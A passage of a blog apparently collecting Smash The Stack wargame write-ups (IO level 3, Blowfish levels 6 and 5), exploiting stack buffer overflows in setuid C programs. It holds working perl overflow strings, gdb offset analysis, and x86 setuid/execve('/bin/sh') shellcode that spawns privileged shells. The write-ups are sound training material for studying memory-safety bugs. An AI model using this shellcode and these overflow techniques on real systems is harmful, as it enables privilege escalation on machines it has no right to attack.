if(strlen(argv[1]) <= 40) limit = strlen(argv[1]);

for(i = 0; i <= limit; i++) {
buf[i] = argv[1][i];
if(i < 36) buf[i] = 0x41;
}

int (*hmmptr)(int) = hmm;

(*fptr)((int)hmmptr);

return 0;

}

Looking at the code, we can see there is a character buffer that gets filled with input from the first command line argument.  This seems like a good place to start looking.  Further analyzing the code shows that if we want to fill this buffer, we’re going to be limited in the number of bytes we can write by the variable “limit”, which controls the buffer writing for-loop.  Looking one line up, we can see the only place where the limit variable is set.  Here, it is set to the length of the first command line argument only if the length of the first command line argument is less than or equal to 40 characters.

So far, his seems promising.  We can see there is a 32 bit buffer and we can control the program to write 40 bytes to it.  This means that the program is vulnerable to a buffer overflow.  However, only being able to overflow it by 8 bytes is a restriction in that it won’t be enough to overwrite the return address on the stack.  Now would be a good time to try and figure out what the stack looks like, so we know what we can overwrite with this buffer overflow, and how it might effect the program.

Looking at the order in which variables are defined in the source code, we can assume the stack has a layout similar to the following:

        4B        32B     4B      4B    4B  4B      4B     4B    4B
[*hmmptr][buf][*fptr][limit][i][argv][argc][sfp][ra]

Judging by the above layout and the program, we have an interesting conundrum.  The variable *fptr is a function pointer.  Also, if we look at the bottom of the code before the final return 0, we can see that this function pointer is used to call the function it points to.  This simply means, if we can get *fptr to point to a function which does something useful, we could benefit.  Also since *fptr is after buf, it looks like it may be in range of the overflow.  However, if we look at the code again, we see the final line of the for-loop doesn’t let us control what is written to memory during the first 36 bytes of writing.  Looking at the above memory layout, that means we might not be able to control *fptr.

However, let’s get a more detailed view of memory in this program instead of our guess.  Let’s load the program in gdb and dissassemble main.  While I won’t post all the assembly code here, I will post a few lines of importance.  Essentially what we want to do is read through the assembly and understand where each variable is on the stack.  To do that, we can look for the instructions that use our variables of interest and see at what offset from the base pointer the variables reside.  Below are the lines we’re looking for with some added comments:

0x08048524 <main+117>: movl $0x8048464,-0x14(%ebp) –int (*fptr)(int) = good;
0x0804855d <main+174>: cmp -0x10(%ebp),%eax –i <= limit;

–buf[i] = 0x41;
0x08048582 <main+211>: lea -0x38(%ebp),%eax –move address of start of buf into eax
0x08048585 <main+214>: add -0xc(%ebp),%eax –add value of i to eax
0x08048588 <main+217>: movb $0x41,(%eax) –move hex value 0x41 into memory address stored in eax

0x08048592 <main+227>: movl $0x804847f,-0x3c(%ebp) –int (*hmmptr)(int) = hmm;

Looking at the above lines of assembly we can figure out where on the call stack the variables for the program reside, specifically what is located 36 bytes after the start of buf. This is an important question because it seems as though we’re only able to control what is written to the four bytes starting at buf+36;  Analyzing the above we can pull out the following offsets for variables:

-0x3c(%ebp) => hmmptr
-0x38(%ebp) => buf
-0x14(%ebp) => fptr
-0x10(%ebp) => limit
-0x0c(%ebp) => i

Finally, doing a little math we can calculate the difference between the memory location of buf and of fptr:

0x38 – 0x14 = 0x24

Which, when we convert it to decimal, is 36.  Interestingly enough, that means that fptr is located starting at the memory location 36 bytes past the start of buf.  So, if we use a 40 character string we can exploit the buffer overflow to change the value of fptr.  Now we need to determine what to change fptr to.  Luckily enough, the function “hmm” looks like a good target!  Hmm does exactly what we want, it spawns a shell.  So using the information we had from the assembly lines above, we can see that the hmm function starts at memory location 0x0804847f.  So, let’s attempt to write a 40 character string which will overwrite fptr with the location of hmm.  Remember to write the bytes in little-endian (reverse) order:

level3@io:~$ /levels/level03 `perl -e ‘print “A”x36,”\x7f\x84\x04\x08″‘`
Win.
sh-4.1$ whoami
level4
sh-4.1$ more /home/level4/.pass
YYYYYYYYYYYY

There we have it.  In this example we found a vulnerable buffer overflow which allowed us to re-write a function pointer and simply wait for the function to be called.  This is slightly different from many of the other common buffer overflows which simply smash through the entire stack frame to overwrite the return address at the end.  It just goes to show that buffer overflows are a serious security vulnerabilities which need to be taken seriously.

Posted in IO, Smash The Stack, Wargames | Tagged , , , , , , | Leave a comment

Blowfish Level 6 – Typo Smash!

Welcome back.  Today we’re going to be looking at Level 6 of the Blowfish wargame from Smash The Stack.  As a reminder, the final password for the next level will the removed from this page and replaced with Y’s.  Let’s jump in.

Let’s use the level 6 password we got from the end of level 5 and ssh into Blowfish.  Upon arrival, let’s get a listing of the files for this level:

level6@blowfish:~$ ls /levels | grep level6
level6
level6.c

As usual, a SUID executable binary and it’s source code.  Since we’ve been seeing quite a few buffer overflows recently, let’s go a head and start off by reading the source code:

level6@blowfish:~$ more /levels/level6.c
#include <stdio.h>
#include <string.h>

int badfunc(char *string1, char *string2) {

char buffer1[1024];
char buffer2[1024];

if(strlen(string1)>=sizeof(buffer1)) {
printf(“\n\t(!) overflow detected.\n”);
printf(“\t(-) exiting…\n\n”);
return -1;
}
else {
printf(“\n\t(+) copying string1 into the buffer…”);
snprintf(buffer1,sizeof(buffer1),”%s”,string1);
printf(“\t\t[done] (%d)\n”, strlen(buffer1));
}

if(strlen(string2)>=sizeof(buffer2)*3) {
printf(“\n\t(!) overflow detected.\n”);
printf(“\t(-) exiting…\n\n”);
return -1;
}
else {
printf(“\t(+) copying string2 into the buffer…”);
snprintf(buffer2,sizeof(buffer1)*3,”%s”,string2);
printf(“\t\t[done] (%d)\n\n”, strlen(buffer2));
}

return 0;
}

int main(int argc, char *argv[]) {

if(argc != 3)
return -1;

badfunc(argv[2], argv[1]);

return 0;
}

Looking at the main function we can see the program takes only two command line arguments, passes them to the function badfunc in switched order, aka badfunc(argv[2], argv[1]), then exits.  So let’s look at the badfunc function.  This function consists of two 1024 byte buffers, and what appears to be input checking code.  The first if statement checks if the first parameter is greater than the length of the first buffer and if so, exits.  If not, it copies the first parameter into the first buffer using snprintf.  The snprintf function is used safely here in that the max number of bytes to copy is specified and thus it won’t overflow the buffer.  However, if we look at the second if statement, we can see it’s slightly different.  The second statement checks if the length of the second parameter is greater than three times the size of the second buffer and if so, exits.  If not, it copies the second argument into the second buffer using snprintf.  In this case, the snprintf function takes three times the length of the first buffer as the maximum number of bytes which will be allowed to be copied.  Now, it may not be exactly clear why three times the buffer size is used in the second if/else statements, however it does leave the program vulnerable to buffer overflow attacks.

To get an idea for the size of our attack strings, let’s try to remember how memory is allocated on the call stack for a frame.  Memory grows down and get allocated for variables in the order in which they are encountered in the program.  Thus, we should have something along the lines of:

   1024B    1024B      4B       4B     4B   4B

[buffer2][buffer1][arg2][arg1][sfp][ra]

So, we’re going to need parameter two of the badfunc function to be the overflow string.  Looking back at main, that’s argv[1] which is the first command line argument.  To overflow, it’s going to need to fill buffer2, buffer1, arg2, arg1, sfp, and correctly position for writing on ra.  So that’s at least 1024 + 1024 + 4 + 4 + 4 = 2060 bytes to pad til the return address, and then we want to write 4 bytes on the return address. Let’s open up gdb and see if we can get our attack string figured out using perl.

level6@blowfish:~$ gdb /levels/level6

(gdb) run `perl -e ‘print “A”x2060,”BBBB”‘` `perl -e ‘print “C”x1023’`
Starting program: /levels/level6 `perl -e ‘print “A”x2060,”BBBB”‘` `perl -e ‘print “C”x1023’`

(+) copying string1 into the buffer… [done] (1023)
(+) copying string2 into the buffer… [done] (2064)
Program received signal SIGSEGV, Segmentation fault.
0x42424242 in ?? ()
(gdb) quit

Oho! Perfectly calculated.  Look at that address, 0x42424242.  We overwrote the return address exactly with four B’s.  Now the last thing we need to do is load up some shellcode and put it’s memory location in our overflow string instead of B’s.  So let’s export some shellcode, with a small NOP padding at the beginning, into the environmental variable SHELLCODE:

level6@blowfish:~$ export SHELLCODE=$’\x90\x90\x90\x90\x90\x90\x90\x90\x90
\x90\x90\x31\xdb\x89\xd8\xb0\x17\xcd\x80\x31\xdb
\x89\xd8\xb0\x2e\xcd\x80\x31\xc0\x50\x68\x2f\x2f
\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89
\xe1\x31\xd2\xb0\x0b\xcd\x80′

Now let’s use our getenv C program to get the memory location of our SHELLCODE environmental variable:

#include <stdio.h>
#include <stdlib.h>

int main(int argc, char *argv[])
{
if(!argv[1])
exit(1);
printf(“%#x\n”, getenv(argv[1]));
return 0;
}

level6@blowfish:/tmp/.t$ ./getenv SHELLCODE
0xbfffda03

Alright!  Now we have our shellcode in memory with our NOP padding starting at location 0xbfffda03.  Now we just need to write that over the return address with our buffer overflow string and we should get a shell.  Let’s try:

level6@blowfish:~$ /levels/level6 `perl -e ‘print “A”x2060,”\x08\xda\xff\xbf”‘` `perl -e ‘print “C”x1023’`

(+) copying string1 into the buffer… [done] (1023)
(+) copying string2 into the buffer… [done] (2064)

sh-3.2$ whoami
level7
sh-3.2$ more /pass/level7
YYYYYYYY

There we have it, a buffer overflow even with the use of a “safe” function.  Unfortunately, it’s only as safe as it’s programmed to be.  If the function had been used correctly, and the buffer size wasn’t multiplied, things wouldn’t have turned out like this.

Posted in Blowfish, Smash The Stack, Wargames | Tagged , , , , | Leave a comment

Blowfish Level 5 – More Stack Smashing

Today we’re going to be looking at the Blowfish wargame from Smash The Stack, working on level 5.  As always, the password will be stripped from this page and replaced with Y’s.  To begin, let’s use the password we got at the end of level 4 to ssh into Blowfish as level5.  Upon logging in, we are told that this level is another buffer overflow located at /levels/level5, so let’s get a directory listing and see what we’re working with today:

level5@blowfish:~$ ls -la /levels | grep level5
-r-sr-x— 1 level5 level4 11775 2006-10-09 18:02 level4
-r-sr-x— 1 level6 level5 12142 2006-10-09 18:02 level5
-r——– 1 level5 level5 272 2006-10-09 18:02 level5.c

Ok, looks like we have the correct SUID executable at /home/level5.  We also have what looks to be the programs source code.  So, let’s look at that source code:

level5@blowfish:~$ more /levels/level5.c
#include <stdio.h>

int main()
{
char buffer[1024];

if (getenv(“VULN”) == NULL) {
fprintf(stderr,”Try Again!!\n”);
exit(1); }

strcpy(buffer, (char *)getenv(“VULN”));

printf(“Environment variable VULN is:\n\”%s\”.\n\n”, buffer);
return 0;
}

Looking at the code we see there is a 1024 byte buffer created.  Next, the program checks that the environmental variable “VULN” exists, if not the program gives an error and exits.  Next, strcpy is used to copy the contents of the environmental variable “VULN” into our 1024 byte buffer we created earlier.  Finally the contents of the buffer is written to the screen with printf.

Looking at the code we can see that there is unsafe use of the strcpy function.  Since the two variable version is used, which doesn’t support a max number of characters to copy, if the environmental variable “VULN” is longer than 1024 bytes the buffer will be overflows and could result in arbitrary code execution.  This sounds like a good avenue of attack, so let’s look into it further.

All we should have to do is write the correct string to the environmental variable “VULN”, so let’s make an attempt.  We know we need VULN to be at least 1024 bytes long, and that there will be a few extra bytes based on the compiler.  So let’s take a guess at about 1024 + 20 = 1044 bytes of padding.  This can be done easily with perl as follows:

level5@blowfish:~$ export VULN=`perl -e ‘print “A”x1044,”BBBB”‘`

Now let’s run the program and see what happens.  If the string we assigned to VULN was long enough, we should expect to get a Segmentation fault:

level5@blowfish:~$ /levels/level5
Environment variable VULN is:
“AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBBB”.

Segmentation fault

Great, just what we wanted.  Now let’s load up gdb and see if we can determine the exact number of bytes we need to write before we overwrite the return address of the call stack:

level5@blowfish:~$ gdb /levels/level5

(gdb) run
Starting program: /levels/level5
Environment variable VULN is:
“AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBBB”.
Program received signal SIGSEGV, Segmentation fault.
0x41414141 in ?? ()
(gdb) quit

Alright.  Those familiar with gdb should know that the final 0x41414141 towards the bottom represents the location in memory which the program tried to execute before blowing up.  This is the “address” which was the return address on the call stack before the program quit.  The reason for the value of 41414141 is that it was overwritten with the 32 bit ascii string “AAAA” as 41 is the hex value of ascii “A”.  So let’s reduce the number of A’s we’re writing to try and position the four B’s directly over the return address.  To do this we need to go back to the shell and re-assign the value to VULN, then we can try gdb again:

level5@blowfish:~$ export VULN=`perl -e ‘print “A”x1036,”BBBB”‘`
level5@blowfish:~$ gdb /levels/level5

(gdb) run
Starting program: /levels/level5
Environment variable VULN is:
“AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBBB”.
Program received signal SIGSEGV, Segmentation fault.
0x42424242 in ?? ()
(gdb) quit

Aha!  What a lucky guess on the second try.  So we must write 1036 bytes into the buffer before we start overwriting the return address.  The next thing we need to do is get our shell code, put it in memory, and get the starting memory address.  However, let’s try something different this level instead of last.  Let’s try and place our shell code in the environmental variable VULN, it’s certainly long enough.  First, let’s make our C program to get the memory location of an environmental variable:

#include <stdio.h>
#include <stdlib.h>

int main(int argc, char *argv[])
{
if(!argv[1])
exit(1);
printf(“%#x\n”, getenv(argv[1]));
return 0;
}

Now let’s go ahead and check where VULN is located:

level5@blowfish:~$ /tmp/.getmem VULN
0xbfffdab4

Now, let’s look at our shell code.  Most importantly, we need to know how many byte it is:

\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90
\x31\xdb\x89\xd8\xb0\x17\xcd\x80\x31\xdb\x89
\xd8\xb0\x2e\xcd\x80\x31\xc0\x50\x68\x2f\x2f
\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53
\x89\xe1\x31\xd2\xb0\x0b\xcd\x80

Counting it up, it looks like it’s going to be 52 bytes.  So 1036 – 52 = 984.  So we’ll need 984 A’s after the shell code.  Also, instead of having B’s at the end, we need to write the memory location of our shell code.  So let’s look at defining VULN again:

level5@blowfish:~$ export VULN=$’\x90\x90\x90\x90\x90\x90\x90\x90\x90
\x90\x90\x31\xdb\x89\xd8\xb0\x17\xcd\x80\x31\xdb
\x89\xd8\xb0\x2e\xcd\x80\x31\xc0\x50\x68\x2f\x2f
\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89
\xe1\x31\xd2\xb0\x0b\xcd\x80’`perl -e ‘print “A”x984,”\xba\xda\xff\xbf”‘`

Now that we have our shell code in memory and our overflow string determined, we can go a head and try to execute the vulnerable program:

level5@blowfish:~$ /levels/level5
Environment variable VULN is:
“1ÛØ°Í1ÛØ°.Í1ÀPh//shh/binãPSá1Ò°
ÍAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAºÚÿ¿”.

sh-3.2$ whoami
level6
sh-3.2$ more /pass/level6
YYYYYYYYYY

To avoid this attack, proper use of strcpy is recommended.  There is a different version of strcpy than the one used here which takes as a third parameter the maximum number of characters to copy.  Using that and providing the length of the buffer (minus one, don’t forget the null character at the end of a char buffer to mark the end of a string) would prevent these types of buffer overflow attacks.

Posted in Blowfish, Smash The Stack, Wargames | Tagged , , , | Leave a comment